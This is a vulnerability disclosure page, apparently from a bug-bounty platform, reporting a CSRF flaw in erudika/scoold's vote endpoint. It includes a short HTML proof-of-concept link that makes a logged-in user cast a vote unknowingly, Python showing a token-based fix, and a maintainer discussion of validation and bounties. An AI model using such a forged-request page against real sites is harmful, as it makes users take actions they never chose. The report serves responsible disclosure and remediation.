Cross-Site Request Forgery (CSRF) in erudika/scoold

Valid
Reported on Jun 20th 2021

✍️ Description

The /voteup/question/* endpoint has no CSRF protection. An attacker could exploit this to manipulate the votes on a question.

🕵️‍♂️ Proof of Concept

An attacker creates the following web page and sends a link to a logged-in user.

<!-- PoC.html -->
<html>
    <head>
        <meta name="referrer" content="no-referrer">
    </head>
    <body>
        <a href="https://live.scoold.com/voteup/question/1279016709126098944">Click Here</a>
    </body>
</html>

When an authenticated user clicks the link, a vote is cast on the user's behalf without the user's knowledge.

Prevention

This attack could easily be prevented by requiring a valid CSRF token before the vote is accepted.
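One way to implement the token check described above, as an added example that is not Scoold's own code (the in-memory session store, the `_csrf` form field name and the `Request` type are assumptions of this example):

```python
import hmac
import secrets
from dataclasses import dataclass, field
from typing import Dict, Optional, Tuple

# Constructed stand-in for a server-side session store: session id -> CSRF token.
# Stored server-side so that only a page the server rendered can know the token.
SESSIONS: Dict[str, str] = {}

# State-changing routes; the page's vulnerable route is /voteup/question/*.
STATE_CHANGING_PREFIXES = ("/voteup/question/",)


def new_session() -> str:
    """Create a session with a fresh, unguessable per-session CSRF token."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = secrets.token_urlsafe(32)
    return sid


def csrf_token_for(sid: str) -> str:
    """The token the server embeds as a hidden field in its own vote form."""
    return SESSIONS[sid]


@dataclass
class Request:
    method: str
    path: str
    session_id: Optional[str] = None       # sent automatically by the browser (cookie)
    form: Dict[str, str] = field(default_factory=dict)  # body fields, POST only


def check_vote_request(req: Request) -> Tuple[bool, str]:
    """Synchronizer-token check for the vote route; returns (allowed, reason)."""
    if not req.path.startswith(STATE_CHANGING_PREFIXES):
        return True, "not a state-changing endpoint"
    if req.session_id is None or req.session_id not in SESSIONS:
        return False, "no valid session"
    # The PoC link is a plain GET: the browser attaches the session cookie but
    # cannot attach a token it never saw. Require POST so <a href>/<img src> fail.
    if req.method != "POST":
        return False, "state change over GET rejected"
    submitted = req.form.get("_csrf", "")
    expected = SESSIONS[req.session_id]
    # Constant-time compare so validity cannot be probed byte by byte.
    if not hmac.compare_digest(submitted.encode(), expected.encode()):
        return False, "missing or invalid CSRF token"
    return True, "vote accepted"
```

The first rejection branch is what stops the PoC: the link in the advisory produces a GET carrying the session cookie and nothing else, so it never reaches the token comparison.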

Ziding Zhang
a month ago
Admin

Hey @oomb, since I couldn't find a security policy or contact email address on the repository, I've created an issue asking for a way to responsibly inform them of this vulnerability. Waiting to hear back, good job!

Alex Bogdanovski validated this vulnerability a month ago
Yadhu M has been awarded the disclosure bounty: $25
The fix bounty is now up for grabs: $6.25
Alex Bogdanovski confirmed that a fix has been merged on 5f2438 a month ago
The fix bounty has been dropped: $6.25
Ziding Zhang
a month ago
Admin

Thank you Alex! May I kindly ask whether there is a reason that you wished not to claim the fix bounty? Your feedback would be much appreciated, thanks 🙏

Alex
a month ago
Maintainer

I still can't understand how this site works... Are these rewards supposed to support maintainers for fixes like this? Anyways, our projects are fully funded by our backing company so that reward is irrelevant to me.

Alex
a month ago
Maintainer

Also I've just noticed that my profile says "0 fixes" - how come?

Alex
a month ago
Maintainer

Oops! Is this a bug?

Jamie Slome
a month ago
Admin

Hello Alex, we allow the maintainer to select themselves as the fixer if they patched the vulnerability themselves. When you confirm the fix, you need to just select yourself as the fixer. This will also reflect the fix on your profile.

With regards to the above, do you want this advisory to be marked as valid or invalid?

Alex
a month ago
Maintainer

Thanks for clarifying that Jamie! The report is valid for sure. I was just playing around and managed to click the disabled "mark as invalid" button, which should not have had any effect but it did.

Jamie Slome
a month ago
Admin

@Alex, apologies for the confusion. From a data perspective, it hasn't actually been reflected as invalid. I will remove the above statuses to prevent confusion when viewing the page.

I will also make sure the mark as invalid button is disabled once the status is set.

Alex
a month ago
Maintainer

Yes, that's a good idea. Thanks again for the support!

Jamie Slome
a month ago
Admin

No worries!